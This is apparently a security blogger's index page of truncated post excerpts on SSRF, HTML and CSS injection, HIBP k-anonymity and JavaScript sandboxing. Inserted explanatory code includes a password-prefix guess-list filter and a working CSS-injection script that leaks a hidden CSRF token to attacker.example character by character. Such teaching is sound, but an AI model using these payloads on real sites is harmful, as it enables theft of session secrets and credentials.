
d0nut

A Star is Born

As we collectively (and emphatically) usher in 2021, I can’t help but look back on 2020 in an effort to try and make sense of it all.

A young, naive d0nut unaware of the bullshit that’s about to come

2020, for me, was the year I was going to become the best version of myself. Just a few months prior to the start of our plague-ridden roller-coaster ride, I began a new position as a Senior Security Engineer on Cruise’s Red Team. I was beyond excited to get an opportunity to branch out from my previously held AppSec role at…


A really fancy paint by numbers.. err, maybe it was a safari for finding different kinds of numbers?

In continuation of the philosophical and foundational nature of the book thus far, Chapter 3 opens with a discussion on kinds of numbers, our reliance on the appearance of some of them in nature and how that fueled their original derivation, and how we can rederive them without ties to our subjective, messy world experience.

The chapter begins with a demonstration of a powerful proof by contradiction establishing the existence of irrational numbers. First, the proof (and its original inspiration, the Pythagorean theorem) relies on the existence of whole numbers and rational numbers (rational numbers being ratios of whole numbers). …


This week wasn’t about me.

I and millions of others were focused on the murder of George Floyd.

Black Lives Matter.

My progress will resume in the next update.


I love watching educational YouTube channels. It’s a great way to constantly keep myself exposed to science and technology. And this is nothing new: I’ve always been engrossed with STEM. Even at a young age, I was sure that I would become a scientist or an engineer, destined to discover and build marvelous things. I wanted to understand the distant stars, peer into a black hole, and prove that Einstein-Rosen bridges could be traversed… one day. Around high school, my dreams of becoming an astrophysicist were pushed aside by a (more practical) desire to become an engineer at a major tech…


Title respectfully inspired by Alyssa Herrera’s Piercing the Veil SSRF blog post

It’s been over a year and a half since I started my bug bounty journey as a hacker. With years of experience triaging reports and working in security, I’ve seen a plethora of bug types, attack vectors, and exploitation techniques. I’ve had such a healthy diversity of exposure to these different concepts that it’s quite honestly surprising that one particular bug class has captured my imagination as effortlessly and decisively as Server-Side Request Forgery has.

Today, I want to share my love for SSRF by discussing what it is, why companies care about it, how I approach testing features I…


Three weeks ago I saw a blog post by fellow bug hunter Jack Cable. The post both inspired and challenged me. The attack vector presented was focused more on a reduction in computational security than on a binary outcome (e.g. XSS, which either fires or it doesn’t).

Jack’s article presents a theoretical attack by a malicious (or compromised) application using K-Anonymity, similar to that used by Have I Been Pwned (HIBP).

Today, we’ll briefly talk about what K-Anonymity is and why the implementation of K-Anonymity in HIBP matters. …
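The following is an added example, not code from the post above or from Jack Cable’s article, that shows the two sides of the k-anonymity range query at the same time: the server never sees more than a 5-hex-character SHA-1 prefix and answers with the whole bucket (the documented shape of HIBP’s Pwned Passwords range API), while any party that learns that prefix, a malicious or compromised application included, can discard every guess in a wordlist whose hash does not share it. The breached corpus, the guess list and the in-process “server” are constructed for the example.

```python
import hashlib
from collections import defaultdict

# Constructed corpus standing in for a breached-password data set
# (password -> number of breach appearances). Not HIBP data.
BREACHED_PASSWORDS = {
    "password": 3_000_000,
    "123456": 20_000_000,
    "letmein": 100_000,
    "qwerty": 4_000_000,
    "hunter2": 25_000,
    "dragon": 800_000,
}

# Constructed attacker guess list (a real wordlist would hold millions of entries).
GUESS_LIST = list(BREACHED_PASSWORDS) + ["correcthorse", "Tr0ub4dor&3", "summer2019"]

PREFIX_LEN = 5  # HIBP's range endpoint keys on the first 5 hex characters of the SHA-1


def sha1_hex(password: str) -> str:
    """Uppercase hex SHA-1, the form the Pwned Passwords range API works with."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


def build_range_index(corpus):
    """Server side: bucket every hash by its prefix, keeping only the suffix per entry."""
    index = defaultdict(dict)
    for password, count in corpus.items():
        digest = sha1_hex(password)
        index[digest[:PREFIX_LEN]][digest[PREFIX_LEN:]] = count
    return index


def range_query(index, prefix: str):
    """Simulated /range/{prefix} endpoint: the only client input the server ever
    sees is the prefix, and it answers with every (suffix, count) pair in the bucket."""
    if len(prefix) != PREFIX_LEN or any(c not in "0123456789ABCDEF" for c in prefix):
        raise ValueError("prefix must be 5 uppercase hex characters")
    return dict(index.get(prefix, {}))


def check_password(index, password: str):
    """Client side: send the prefix, match the suffix locally, never send the hash.
    Returns (breach_count, k): k is the anonymity set size, the number of distinct
    hashes the server cannot tell apart for this query."""
    digest = sha1_hex(password)
    bucket = range_query(index, digest[:PREFIX_LEN])
    return bucket.get(digest[PREFIX_LEN:], 0), len(bucket)


def candidates_for_prefix(guess_list, prefix: str):
    """Attacker side (the reduction the article is about): a party that learns only
    the prefix can still drop every guess whose hash does not start with it, which
    shrinks a guess list by roughly a factor of 16**PREFIX_LEN, i.e. about 2**20."""
    return [g for g in guess_list if sha1_hex(g).startswith(prefix)]


if __name__ == "__main__":
    index = build_range_index(BREACHED_PASSWORDS)
    count, k = check_password(index, "hunter2")
    print(f"hunter2 seen {count} times; server could not distinguish {k} hash(es)")
    prefix = sha1_hex("hunter2")[:PREFIX_LEN]
    survivors = candidates_for_prefix(GUESS_LIST, prefix)
    print(f"guess list shrinks from {len(GUESS_LIST)} to {len(survivors)} given prefix {prefix}")
```

With six passwords in the corpus almost every bucket holds a single hash, so k is 1 here; against the real data set a 5-character prefix selects several hundred suffixes, which is the anonymity the scheme buys. The guess-list function is the part to keep in mind when reading the post: the prefix is harmless to the honest server but is still 20 bits of the hash handed to whoever is on the wire or inside the client.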


I used Google Drawings and there’s no shame in that

This is a story about how I (re)discovered an exploitation technique and took a bug with fairly limited impact to a 5 digit bounty by bypassing existing mitigations.

A Curious Case of HTML Injection

André Baptista and Cache-Money were working on a very strange bug. It started off as a simple character-set bypass and, through a crazy series of steps, evolved into HTML injection somewhere else in the target (not full-blown XSS, though, due to DOMPurify). It was a cool chain and they could tell they were onto something big, but the next step was giving them a fair bit of trouble.

After hearing about the…


This is the only good CC0 image I could find

If you’re not aware, I joined Dropbox’s security team last September. Since then, I’ve become very involved in the bug bounty community on two fronts: running a program, and hacking in my spare time. It’s offered me a unique perspective on many divisive issues, and I’ve used my experiences both to improve our program and to help bring a program’s perspective into the conversation with other prominent bug hunters.

Sometime last week I gave back to the bug bounty community by contributing a tip to #bugbountytip on Twitter.

Originally, I didn’t expect anyone to…


Today’s topic is something that’s already pretty well covered: CSS injections. I wanted to talk about my experience implementing this attack on a real site. As you may have encountered, the situation in which you find a vulnerability is often not the pristine one in which the vulnerability was originally described (like XSS, but behind a WAF). As such, writing about what researchers encounter in real life can shed light on practical preventative mechanisms (or general roadblocks) and the bypasses for those blockers.

As some of you may know, I’ve recently taken up bug bounties in my spare time…
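As an added example (not the post’s own code, and not the payload the author used on the real site), here is the textbook CSS injection the excerpt refers to: a block of `[value^="..."]` attribute-selector rules, one per candidate next character, each pointing `background-image` at an attacker callback so that the one rule the browser matches leaks one character of a hidden token. The attacker host, the token alphabet and the in-process stand-in for the browser’s selector matching are all assumptions made for the example.

```python
import string
from urllib.parse import quote, urlparse, parse_qs

CHARSET = string.ascii_lowercase + string.digits   # assumed token alphabet
CALLBACK = "https://attacker.example/leak"         # hypothetical attacker-controlled host


def build_rules(attr_name, known_prefix, charset=CHARSET, callback=CALLBACK):
    """One rule per candidate next character. Each entry is
    (guessed_prefix, css_selector, callback_url)."""
    rules = []
    for c in charset:
        guess = known_prefix + c
        selector = f'input[name="{attr_name}"][value^="{guess}"]'
        url = f"{callback}?v={quote(guess)}"
        rules.append((guess, selector, url))
    return rules


def render_css(rules):
    """The text that would be injected into a <style> block or a style-sheet context."""
    return "\n".join(f'{sel} {{ background-image: url("{url}"); }}' for _, sel, url in rules)


def simulate_browser(rules, actual_value):
    """Stand-in for the browser: [value^="x"] matches when the element's value
    attribute starts with x, and a matching rule's background URL gets fetched.
    Returns the list of URLs the attacker's server would receive."""
    return [url for guess, _, url in rules if actual_value.startswith(guess)]


def recover_token(attr_name, actual_value, charset=CHARSET, max_len=64):
    """The loop the attacker drives: inject rules for the current prefix, read the
    character back from the callback, extend the prefix, repeat. Stops when no rule
    fires, which happens at the end of the token or at a character outside charset."""
    known = ""
    while len(known) < max_len:
        hits = simulate_browser(build_rules(attr_name, known, charset), actual_value)
        if not hits:
            break
        known = parse_qs(urlparse(hits[0]).query)["v"][0]
    return known


if __name__ == "__main__":
    # Constructed victim markup: <input type="hidden" name="csrf" value="a1b2c3">
    secret = "a1b2c3"
    print(render_css(build_rules("csrf", ""))[:200], "...")
    print("recovered:", recover_token("csrf", secret))
```

Two practical points the simulation makes visible: attribute selectors match the markup attribute, not the live `.value` property, so a token only typed into a field by the user is not reachable this way; and a character outside the guessed alphabet stops the loop early, which is why real payloads need the full charset of the target token (and, against a WAF, usually a few rounds of encoding the selector and the callback URL). A `Content-Security-Policy` with a restrictive `img-src` blocks the callback fetch entirely.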


Where I want my code to run

Hey all!

I was terribly excited to see all of my new followers on Medium and wanted to ensure I started giving a (near) constant supply of new reading material for everyone. As such, I decided to write this quick article based on a topic of discussion that came up during my trip to Amsterdam (which I’ll write about soon enough :P ).

Why Sandbox JavaScript (with JavaScript)?

Honestly there probably isn’t a good reason. Unless you’re actively exploiting either a CTF challenge or an Electron app that implemented the security guidelines to a ‘T’, you probably won’t find yourself in a case where you…

d0nut

Security Engineer, developer, and part-time bug hunter
